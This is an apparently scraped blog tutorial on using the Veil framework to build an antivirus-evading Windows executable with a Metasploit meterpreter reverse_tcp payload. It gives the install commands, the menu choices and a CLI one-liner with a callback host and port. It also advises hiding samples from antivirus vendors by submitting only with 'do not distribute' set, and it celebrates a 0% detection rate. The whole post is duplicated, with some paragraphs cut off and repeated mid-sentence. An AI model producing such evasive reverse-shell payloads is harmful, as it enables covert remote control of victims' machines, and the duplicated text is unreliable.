Bypass AV using Veil.
Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright
@TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali
Linux which has the goal of:
• Bypass common AV solutions used.
• Get the payloads from Metasploit framework, and get the new ones in the
future Metasploit releases.
• Try to create each payload as random as possible.
Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some
examples about how to bypass severals anti-virus.
The main changes in this version is:
• x64 compatibility – They have updated their setup script in order to make
Veil compatible with both x86 and x64 versions.
• Update Feature – Now Veil has an update function. Now we can update Veil
either the command line or menu.ht
@TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali
Linux which has the goal of:
• Bypass common AV solutions used.
• Get the payloads from Metasploit framework, and get the new ones in the
future Metasploit releases.
• Try to create each payload as random as possible.
Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some
examples about how to bypass severals anti-virus.
The main changes in this version is:
• x64 compatibility – They have updated their setup script in order to make
Veil compatible with both x86 and x64 versions.
• Update Feature – Now Veil has an update function. Now we can update Veil
either the command line or menu.
There are tutorials available at http://www.veil-evasion.com The framework can be
downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at
https://github.com/ChrisTruncer/Veil/archive/master.zip.
If you want to install Veil in your own environment you can use the commands
below:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip unzip
master.zip cd Veil-master/setup cd .. ./setup.sh
If you want to work with Kali Linux, with the commands below it will be enough.
apt-get update apt-get install veil
I had a bad experience with the second option and I prefer to install Veil with the
first one using "setup.sh" script.
The veil's developers don't want to submit any payload to www.virustotal.com to
avoid distribution to the anti-virus vendors. There are an alternative:
vscan.novirusthanks.org. That site scan the suspicious files for malware detection
and offer us the option below: "Do not distribute the sample".
When Veil is recently installed, just run it with the command below:
./Veil
Here, Veil offers us more information about the payloads. In this case I chose
python/b64VirtualAlloc typing "18"
When our payload is loaded type "generate". You can set some specifics options, but
in this post, we are going to try the default options.
Now we are going to select msfvenom typing "1"
After that we need to type some details:
• Enter metasploit payload: "windows/meterpreter/reverse_tcp"
• Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
• Enter value for 'LPORT': "443"
Then it's necessary to wait while the shellcode is been generated.
You need to press enter and then Veil requests us the name of our payload. In this case undetectable"
We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type "1"
In the end, we can get our executable at "/root/Veil-master/output/compiled/"
Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check "Do not distribute the sample".
If you choose to don't check this options or you decide to submit the executable to
www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.
You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!
If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443
Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright
@TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali
Linux which has the goal of:
• Bypass common AV solutions used.
• Get the payloads from Metasploit framework, and get the new ones in the
future Metasploit releases.
• Try to create each payload as random as possible.
Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some
examples about how to bypass severals anti-virus.
The main changes in this version is:
• x64 compatibility – They have updated their setup script in order to make
Veil compatible with both x86 and x64 versions.
• Update Feature – Now Veil has an update function. Now we can update Veil
either the command line or menu.ht
@TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali
Linux which has the goal of:
• Bypass common AV solutions used.
• Get the payloads from Metasploit framework, and get the new ones in the
future Metasploit releases.
• Try to create each payload as random as possible.
Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some
examples about how to bypass severals anti-virus.
The main changes in this version is:
• x64 compatibility – They have updated their setup script in order to make
Veil compatible with both x86 and x64 versions.
• Update Feature – Now Veil has an update function. Now we can update Veil
either the command line or menu.
There are tutorials available at http://www.veil-evasion.com The framework can be
downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at
https://github.com/ChrisTruncer/Veil/archive/master.zip.
If you want to install Veil in your own environment you can use the commands
below:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip unzip
master.zip cd Veil-master/setup cd .. ./setup.sh
If you want to work with Kali Linux, with the commands below it will be enough.
apt-get update apt-get install veil
I had a bad experience with the second option and I prefer to install Veil with the
first one using "setup.sh" script.
The veil's developers don't want to submit any payload to www.virustotal.com to
avoid distribution to the anti-virus vendors. There are an alternative:
vscan.novirusthanks.org. That site scan the suspicious files for malware detection
and offer us the option below: "Do not distribute the sample".
When Veil is recently installed, just run it with the command below:
./Veil
Here, Veil offers us more information about the payloads. In this case I chose
python/b64VirtualAlloc typing "18"
When our payload is loaded type "generate". You can set some specifics options, but
in this post, we are going to try the default options.
Now we are going to select msfvenom typing "1"
After that we need to type some details:
• Enter metasploit payload: "windows/meterpreter/reverse_tcp"
• Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
• Enter value for 'LPORT': "443"
Then it's necessary to wait while the shellcode is been generated.
You need to press enter and then Veil requests us the name of our payload. In this case undetectable"
We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type "1"
In the end, we can get our executable at "/root/Veil-master/output/compiled/"
Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check "Do not distribute the sample".
If you choose to don't check this options or you decide to submit the executable to
www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.
You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!
If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443
No comments:
Post a Comment